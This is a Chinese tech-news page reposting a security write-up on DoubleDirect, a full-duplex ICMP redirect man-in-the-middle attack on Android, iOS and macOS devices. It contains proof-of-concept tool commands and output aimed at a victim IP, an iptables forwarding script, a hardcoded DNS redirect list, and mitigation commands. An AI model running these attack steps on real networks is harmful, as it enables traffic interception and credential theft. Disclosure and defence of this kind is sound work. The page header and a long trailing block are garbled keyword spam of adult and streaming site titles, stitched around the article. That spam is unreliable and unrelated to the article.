精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

劍指Android和iOS系統的中間人攻擊技術

安全 黑客攻防
安全研究員發現一種新型的中間人攻擊技術——DoubleDirect,它的攻擊目標主要是運行Android系統和iOS系統的智能手機和平板電腦。

安全研究員發現一種新型的中間人攻擊技術,它的攻擊目標主要是運行Android系統和iOS系統的智能手機和平板電腦。

這種被稱為DoubleDirect的技術屬于中間人(MITM)攻擊的一種。攻擊者可以利用這種技術把受害者訪問谷歌、Facebook、Twitter上的流量重定向到攻擊者控制的設備上,而一旦受害者的流量被重定向了,攻擊者就可竊取受害者的私人數據,比如,郵箱ID、登錄憑證、銀行信息等,當然他還可以在受害者的機器上安裝木馬等惡意軟件。

劍指Android和iOS的DoubleDirect中間人攻擊

舊金山的一家移動安全公司Zimperium在其博客中詳細介紹了這一威脅。黑客正在利用DoubleDirect技術進行針對性攻擊,范圍包括美國、英國、加拿大在內的31個國家,5大互聯網巨頭——Google,Facebook,Hotmail,Live.com和Twitter

[[123178]]

全雙工的ICMP重定向中間人攻擊

ICMP攻擊是中間人攻擊(MITM)的一種,傳統的ICMP重定向攻擊及其利用工具則類似于ettercap +半雙工中間人攻擊(MITM)。受害者因為ICMP重定向攻擊被欺騙,路由器因為ARP欺騙攻擊被毒化。這種ICMP攻擊可以通過防御ARP攻擊的傳統手段相對輕松的防御住。

而DoubleDirect則有所不同,它通過ICMP(網間控制報文協議)重定向數據包改變主機路由表。ICMP重定向數據包會告訴主機有一個更好的路由路徑可以達到目的地。改變受害者機器上的路由表可以使任意的網絡流量流向特定的IP地址(比如攻擊者的IP),然后攻擊者就可以從中作梗發動中間人攻擊了。在流量被重定向之后,攻擊者可通過利用客戶端漏洞攻擊受害者的設備,從而訪問受害者的網絡。

通過研究DoubleDirect攻擊,我們發現攻擊者通過目前未知的技術,實現了全雙工的ICMP重定向中間人攻擊。而傳統的ICMP重定向攻擊是有半雙工限制的。

DoubleDirect攻擊是如何工作的?

Zimperium移動安全實驗室在研究該攻擊之后創建了一個攻擊測試工具,它可以證明發動全雙工ICMP重定向攻擊是有可能的。ICMP重定向攻擊的難點在于,攻擊者必須預先知道受害者已經可到達的IP地址。

攻擊者怎樣知道受害者可達的IP地址呢?要回答這個問題我們應該先分析受害者的設備。

例如,當我們在瀏覽器中輸入www.zimperium.com時,應用程序會發送一個DNS請求以找出www.zimperium.com主機的IP地址。

首先,我們會用ICMP重定向數據包把受害者設備上的所有DNS流量轉發到我們的設備上。大多數時候我們都能預測到受害者使用的DNS服務器。

如果受害者與我們在同個局域網(LAN),那么受害者的DNS服務器也很有可能與我們通過DHCP(動態主機配置協議)所獲得的DNS服務器相同。當然,有些移動設備使用的是默認的DNS服務器(8.8.8.8或者 8.8.4.4)。

我們還提供了一個簡單有效的工具來研究DoubleDirect,單擊這里即可下載。

如果想編譯和運行這個工具,你需要在系統上安裝libcrafter(https://code.google.com/p/libcrafter/)。libcrafter是一個C++開發的跨平臺庫,可以用來抓包和解包。在GNU/linux或者MAC OS X系統上編譯,你需要執行以下的命令:

$ git clone https://github.com/pellegre/libcrafter
$ cd libcrafter/libcrafter
$ ./autogen.sh
$ make
$ sudo make install
$ sudo ldconfig

值得注意的是,在配置libcrafter之前你需要安裝抓包工具libpcap:

#apt-get install libpcap-dev

#p#

DoubleDirect實例:全雙工ICMP重定向攻擊

場景再現

網關=192.168.1.1

攻擊機(Ubuntu)=192.168.1.105

受害機(GalaxyS4)=192.168.1.101

受害機配置

首先需要做的是,檢查設備是否支持重定向。GalaxyS4會默認支持重定向:

# cat /proc/sys/net/ipv4/conf/all/accept_redirects 1

其次,如果你的設備不支持ICMP重定向但你又想測試這一攻擊,那可以執行下面的命令:

# echo 1 > /proc/sys/net/ipv4/conf/all/accept_redirects

攻擊機配置

為了保證攻擊的正確進行,我們需要在攻擊者設備上執行一些命令:

對數據流量進行轉發(該方式具有暫時性,重啟便失效。要想長久保持轉發需要修改/etc/sysctl.conf)

# echo 1 > /proc/sys/net/ipv4/ip_forward

關閉攻擊機的重定向設置。這很重要!我們需要告訴告訴攻擊設備的內核:不要發送重定向

# echo 0 > /proc/sys/net/ipv4/conf/all/send_redirect

攻擊演示

編譯DoubleDirect_poc.cpp文件:

$ g++ doubledirect_poc.cpp -o doubledirect_poc -lcrafter
$ ./doubledirect_poc
[#] ***** ZIMPERIUM - DoubleDirect :: Full-Duplex ICMP Redirect Audit Tool *****
[#] Usage: ./doubledirect_poc [options]

POC選項:

-i 指定網絡接口

-v 受害機IP地址

-d 毒化的目標IP

當受害者訪問一些網址時,我們會毒化一個受害者機器可達的遠程IP地址,而不是進行局域網ARP欺騙。然后我們就讓受害者的流量發向我們的設備,而不通過真正的網關。

當設備發送了一個目的地為8.8.8.8的IP數據包時,它本該經過網關(192.168.1.1)……

我們在攻擊者設備上執行:

$ sudo ./doubledirect_poc -i wlan0 -v 192.168.1.101 -d 8.8.8.8
[#] Attack parameters :
[+] Interface : wlan0
[+] Victim IP address : 192.168.1.101
[+] Destination to poison : 8.8.8.8
[#] Gateway parameters :
[+] Gateway IP address : 192.168.1.1
[+] Gateway MAC address : *:*:*:*:AE:51
[#] My parameters :
[+] My IP address : 192.168.1.105

從上面的演示可以看出,我們是怎樣毒化8.8.8.8為我們的IP192.168.1.105的。當受害者發送目的地為8.8.8.8的數據包時,它會把我們的設備作為網關,這樣一來我們就可以嗅探到流向目的地的所有流量了。

一旦所有的DNS流量都通過我們的電腦轉發了,我們通過DNS回應包獲得IP地址,并可以向這些IP地址發送ICMP重定向數據包。這樣,我們不僅能嗅探到受害者的所有DNS流量,還可以完全的將其轉發到我們的設備上。#p#

測試你是否易受DoubleDirect的攻擊,我們可以寫一個bash腳本,利用iptables進行IP轉發:

# cat iptables_dobule_direct.sh
#!/bin/sh
if [ $# -lt 1 ]; then
echo "[@] Usage: `basename ${0}` "
echo "[@] Example: `basename ${0}` wlan0"
exit 0
fi
INTERFACE=${1}
echo 1 > /proc/sys/net/ipv4/ip_forward
echo 0 > /proc/sys/net/ipv4/conf/$INTERFACE/send_redirects
iptables --flush
iptables --zero
iptables --delete-chain
iptables -F -t nat
iptables --append FORWARD --in-interface $INTERFACE --jump ACCEPT
iptables --table nat --append POSTROUTING --out-interface $INTERFACE --jump MASQUERADE
# ./iptables_double_direct.sh wlan0

最后執行Zimperium DoubleDirect攻擊測試工具:

# ./doubledirect_poc -i wlan0 -v 192.168.1.101
[#] ***** ZIMPERIUM - DoubleDirect :: Full-Duplex ICMP Redirect Audit Tool *****
[#] Attack parameters :
[+] Interface : wlan0
[+] Victim IP address : 192.168.1.101
[#] Gateway parameters :
[+] Gateway IP address : 192.168.2.1
[+] Gateway MAC address : 00:1f:*:*:*:*
[#] My parameters :
[+] My IP address : 192.168.2.103

DNS服務器是被硬編進代碼(397行,DoubleDirect_poc.cpp文件)里的。

// Hardcoded DNS servers we want to redirect to our machine
startIcmpRedirectAttack(*redirect_parameters, getGatewayIp(redirect_parameters->_interface)); // Gateway
startIcmpRedirectAttack(*redirect_parameters, "8.8.8.8");
startIcmpRedirectAttack(*redirect_parameters, "8.8.4.4");
startIcmpRedirectAttack(*redirect_parameters, "208.67.222.222");
startIcmpRedirectAttack(*redirect_parameters, "208.67.220.220");

應對策略

Android(安卓)、IOS、Mac OSX設備通常默認支持ICMP重定向。

要想知道你的OS X設備是否易受DoubleDirect攻擊,可以執行以下命令:


sysctl net.inet.ip.redirect | grep ": 1" && echo "DoubleDirect: VULNERABLE" || echo "DoubleDirect: SAFE"

要想使ICMP重定向在Mac失效可以執行以下命令(需要Root權限):

# sysctl -w net.inet.ip.redirect=0

注:這種修復不具有持久性,要想使其長久的有效,你可以重啟之后在命令行中添加啟動腳本。

對于Android來說,大部分的Android設備都會默認支持重定向,要想使其失效,需要root設備并且執行以下命令:

# echo 0 > /proc/sys/net/ipv4/conf/all/accept_redirects

哪些設備會受到攻擊

受影響的系統包括

Android設備:大部分Android設備,包括Nexus 5 + Lollipop

iOS設備:最新iOS設備,包括iOS 8.1.1()以外

Mac:Mac OS X Yosemite(優勝美地)

大部分Windows和GNU/Linux用戶不會受到DoubleDirect的攻擊,因為這些操作系統不支持ICMP重定向數據包。

參考來源:http://blog.zimperium.com

責任編輯:藍雨淚 來源: FreeBuf
相關推薦

2013-11-11 10:36:04

2012-11-20 13:06:57

2016-09-27 22:45:47

2014-03-20 10:26:58

2017-02-16 08:53:42

2019-01-28 08:59:59

2020-05-07 15:24:22

中間人攻擊MITM

2014-03-17 09:16:08

2014-05-15 10:20:07

2015-12-29 10:41:16

2015-01-05 13:29:37

2014-10-08 09:38:49

2016-10-24 14:23:14

2015-02-26 09:50:04

2009-08-14 11:25:38

2010-06-13 12:06:41

2014-11-21 11:46:55

2010-09-25 14:50:34

2014-05-13 09:23:35

2013-03-21 18:54:23

點贊
收藏

51CTO技術棧公眾號

国产成人综合网| 精品视频久久| 亚洲成av人**亚洲成av**| 国产在线精品一区二区中文| 国产专区第一页| 日韩精品dvd| 精品国产髙清在线看国产毛片| 国产肥臀一区二区福利视频| 91涩漫在线观看| 粉嫩av亚洲一区二区图片| 日韩av电影在线免费播放| 午夜成人亚洲理伦片在线观看| 国产精品对白| 欧美福利视频一区| 日本wwww视频| 91三级在线| 国产精品午夜在线| 国产一区二区三区免费不卡| 这里只有精品9| 国产日韩高清一区二区三区在线| 久久激情五月丁香伊人| 熟女高潮一区二区三区| 国产精品一线| 91精品国产综合久久久蜜臀图片 | 91网站免费视频| 午夜视频在线观看精品中文| 欧美亚一区二区| 成人免费观看cn| 性欧美ⅴideo另类hd| 国产精品欧美综合在线| 青娱乐国产91| 亚洲欧美日韩精品永久在线| 国产精品亚洲综合一区在线观看| 国产精品毛片a∨一区二区三区|国 | 久久av综合| 日韩高清欧美高清| 人妻 丝袜美腿 中文字幕| 日韩美女视频在线观看| 午夜一区二区三区免费| 亚洲一区二区三区四区电影| 精品视频999| 黄www在线观看| 性爽视频在线| 欧美日韩在线另类| 免费成人午夜视频| www.8ⅹ8ⅹ羞羞漫画在线看| 一区二区成人在线视频| 日本免费黄色小视频| 麻豆影视在线观看_| 国产精品二三区| 亚洲国产一区二区在线| av电影在线播放高清免费观看| 国产调教视频一区| 日韩资源av在线| 国产精品毛片一区二区三区四区| 亚洲色图27p| 欧美精品国产白浆久久久久| 亚洲精美色品网站| 久久国产精品无码一级毛片| 欧美中文一区| 亚洲视频一区二区三区| 国产123在线| 久久在线视频| 久久成人综合视频| 久热这里有精品| 国精品一区二区| 97成人超碰免| 无码人妻一区二区三区线| 日韩高清中文字幕一区| 国产美女久久久| 国产婷婷在线视频| 大胆亚洲人体视频| 欧美日韩在线精品| 永久免费av在线| 亚洲天堂a在线| 99在线免费视频观看| 九色porny丨国产首页在线| 日韩欧美在线播放| www.夜夜爽| 一区二区三区四区视频免费观看| 亚洲电影免费观看高清| 亚洲人成人无码网www国产| 色综合天天爱| 久久久天堂国产精品女人| 久久人妻免费视频| 精品一区二区三区免费观看| 国产精品一区在线播放| 黄色av网址在线免费观看| 国产精品女主播在线观看| 精品无码av无码免费专区| 蜜桃在线视频| 欧美日韩亚洲不卡| 国产精品一区二区在线免费观看| 天天久久夜夜| 久久av在线看| 久久久国产精品成人免费| 美女尤物国产一区| 好吊色欧美一区二区三区视频| freemovies性欧美| 亚洲自拍偷拍图区| 韩国中文字幕av| a级日韩大片| 深夜福利日韩在线看| 成人免费网站在线看| 熟女少妇a性色生活片毛片| 狠狠干综合网| 国产在线高清精品| 同心难改在线观看| 亚洲码国产岛国毛片在线| 色欲av无码一区二区人妻| 日本在线视频一区二区三区| 亚洲天堂av女优| 日本熟女一区二区| 国内精品免费在线观看| 日本免费高清一区| 成年人黄色大片在线| 欧美电影一区二区三区| 成人在线一级片| 亚洲啪啪91| 亚洲精品日韩av| 91精彩在线视频| 欧美性xxxxx极品| 蜜桃色一区二区三区| 国产精品99一区二区三| 国产精品久久久久久久久久久新郎 | 超碰在线97国产| 91精品国产综合久久香蕉的特点 | 日本五十肥熟交尾| 亚洲精品99| 国产精品美女www| 国内精品一区视频| 欧美视频13p| 97人妻精品一区二区三区免费| 久久久9色精品国产一区二区三区| 国产不卡视频在线| 欧美女优在线| 欧美日韩一区二区三区在线免费观看 | 国产一区二区三区蝌蚪| 亚洲va韩国va欧美va精四季| 欧美亚洲韩国| 亚洲欧美日本精品| 亚洲AV无码成人精品区东京热| 成人不卡免费av| 日韩 欧美 视频| 中文在线免费一区三区| 欧美富婆性猛交| 亚洲va欧美va国产综合久久| 国产成人精品亚洲| 久久久久久久网| 情侣黄网站免费看| 米奇777超碰欧美日韩亚洲| 欧美一级视频一区二区| 你懂的视频在线观看| 色先锋aa成人| 日韩一区二区a片免费观看| 天堂影院一区二区| 日韩精品一区二区三区四区五区| 欧美电影网站| 尤物yw午夜国产精品视频明星| 这里只有精品免费视频| 国产精品美日韩| 一级网站在线观看| 在线精品一区| 欧美日韩亚洲一区二区三区四区| 日韩三级影视| 精品国产依人香蕉在线精品| av一区二区三| 亚洲成人自拍偷拍| mm131丰满少妇人体欣赏图| 蜜臀av在线播放一区二区三区| www.午夜色| 香蕉大人久久国产成人av| 国内精品久久久久影院优| 天堂av在线免费观看| 欧美三级蜜桃2在线观看| 国产在线一卡二卡| 91最新地址在线播放| 日本a√在线观看| 欧美.www| 欧美福利精品| 精品国产三区在线| 97香蕉超级碰碰久久免费软件| 国产在线资源| 欧美一级在线免费| 免费av网站在线| 中文字幕在线播放不卡一区| 丰满人妻一区二区三区免费视频棣| 午夜亚洲一区| 五月天av影院| 亚洲成aⅴ人片久久青草影院| 国产精品一区二区三区免费视频| 国产丝袜在线播放| 国产亚洲精品久久| 亚洲精品久久久久久久久久久久久久 | 精品第一国产综合精品aⅴ| 精品成人无码久久久久久| 亚洲另类一区二区| 欧美熟妇激情一区二区三区| 盗摄精品av一区二区三区| 香蕉视频网站入口| 美国黄色a级片| 亚洲性视频h| 亚洲永久一区二区三区在线| 给我免费播放日韩视频| 国产欧美日韩精品丝袜高跟鞋| 丁香花在线影院| 这里只有精品在线观看| 三级在线观看网站| 欧美日本视频在线| 91久久国产综合久久91| 亚洲aaa精品| 91麻豆免费视频网站| 久久一日本道色综合| 最新国产精品自拍| 久久99精品久久只有精品| 黄色a级片免费| 亚洲人成久久| 国产激情片在线观看| 日产精品一区二区| 日韩免费av一区二区三区| 精品人人人人| aa成人免费视频| 国产精品国产三级在线观看| 国产精品欧美一区二区三区奶水 | 欧美精品二区| 夜夜爽99久久国产综合精品女不卡| 亚洲第一福利社区| 精品视频在线观看| 福利在线一区| 国产精品毛片va一区二区三区| 国产精品亚洲四区在线观看| 国产日韩精品一区二区| 欧美色片在线观看| 日韩av快播网址| 亚洲欧洲高清| 欧美一区二区三区艳史| 在线人成日本视频| 57pao成人永久免费视频| 俺来俺也去www色在线观看| 欧美大片在线看| 手机在线免费看av| 欧美日韩国产成人| 青草在线视频在线观看| 欧美黑人xxx| japanese色国产在线看视频| 欧美黑人巨大精品一区二区| 欧美xxxx视频| 国内精品久久久久久久久| h片在线观看视频免费| 午夜精品久久久久久久99黑人| 91白丝在线| 91极品女神在线| 中文在线а√在线8| 国产97免费视| 久久91视频| 国产精品中文字幕在线| 亚洲日日夜夜| 91在线国产电影| 91精品国产乱码久久久竹菊| 日韩欧美综合在线视频| 中文字幕5566| 国产欧美日韩另类一区| 日韩精品电影一区二区三区| 中文字幕一区在线| 五月天丁香激情| 香蕉影视欧美成人| 久久久久久久久久久影院| 在线一区二区视频| 国产精品一区二区av白丝下载| 日韩一级片网址| 婷婷色在线观看| 在线视频亚洲欧美| 在线三级电影| 欧美一区亚洲一区| 日本午夜精品久久久久| 懂色中文一区二区三区在线视频| 网友自拍区视频精品| 亚洲高清乱码| 狠狠综合久久av一区二区老牛| 国产麻花豆剧传媒精品mv在线| 美女一区二区视频| 性猛交╳xxx乱大交| 国产日韩精品一区二区三区| 麻豆明星ai换脸视频| 精品人伦一区二区三区蜜桃网站| 国模私拍一区二区| 精品国内二区三区| 国产在线色视频| 欧美精品亚州精品| 小黄鸭精品aⅴ导航网站入口| 亚洲综合av影视| 嫩草一区二区三区| 国产 欧美 日本| 日本va欧美va瓶| 亚洲免费观看在线| 国产精品视频在线看| 国产在线精品观看| 69av一区二区三区| 国产大片在线免费观看| 久久久久久噜噜噜久久久精品| 黄色欧美视频| 久久99精品久久久久子伦| 色综合天天爱| 四虎永久在线精品无码视频| 国产精品夜夜爽| 久久免费手机视频| 欧美三级xxx| 午夜精品久久久久久久91蜜桃| 中文字幕日韩免费视频| 在线免费看h| 精品高清视频| 欧美午夜精品| 91日韩精品视频| 国产精品网站在线播放| 成人午夜视频在线播放| 欧美精品一区二区三区一线天视频 | 久久亚洲欧美日韩精品专区| 成人av免费电影网站| 一区二区三区四区高清精品免费观看| 亚洲一区二区在线免费| 国产精品天天看| 亚洲中文一区二区| 国产丝袜精品视频| 精品极品在线| 国产精品区免费视频| 亚洲精品久久| 日本国产一级片| 国产精品久久99| 最新国产中文字幕| 中文字幕在线日韩| 999国产精品亚洲77777| 欧美亚洲免费在线| 久久精品亚洲| 午夜精产品一区二区在线观看的| 精品久久久一区二区| 黄色小视频免费观看| 久久久久久久久久国产| 一区三区自拍| 欧美日韩福利在线| aaa欧美色吧激情视频| 日韩熟女精品一区二区三区| 亚洲电影免费观看高清完整版在线观看| a视频在线免费看| 99c视频在线| 韩日欧美一区| 日本一级片在线播放| 欧美日韩精品在线观看| 深夜福利视频一区| 日韩av手机在线看| 欧美一区电影| 中日韩av在线播放| 亚洲欧美日韩国产综合在线| 国产精品玖玖玖| 欧美激情精品久久久久久| 91精品国产自产在线丝袜啪| 国产 日韩 欧美在线| 26uuu国产电影一区二区| 91在线视频免费播放| 综合网中文字幕| 嫩呦国产一区二区三区av | 亚洲一区观看| 一色道久久88加勒比一| 欧美日产在线观看| 怡红院在线观看| 国产在线视频欧美一区二区三区| 亚洲在线国产日韩欧美| 日本免费www| 日韩一区国产二区欧美三区| brazzers在线观看| 欧美日韩喷水| 国产麻豆精品theporn| 久久精品国产亚洲av高清色欲 | 国产超碰91| 香蕉久久国产| 免费看特级毛片| 亚洲国产精品电影在线观看| 香蕉视频亚洲一级| 久久久无码中文字幕久...| av在线综合网| 中文 欧美 日韩| 色在人av网站天堂精品| 免费一区二区| 日本55丰满熟妇厨房伦| 欧美日韩在线视频首页| 国产伦精品一区二区三区视频我| 日韩精品一级中文字幕精品视频免费观看| 国产美女永久免费无遮挡| 欧美一区二区三区成人| 日韩伦理精品| 先锋影音男人资源| 久久综合久久久久88| 精品久久久久中文慕人妻| 日本不卡视频在线播放| 91精品观看| 国产熟妇搡bbbb搡bbbb| 日韩一级二级三级精品视频| 台湾佬成人网| 日韩黄色短视频| 国产精品久久久久久久午夜片| 天天摸夜夜添狠狠添婷婷|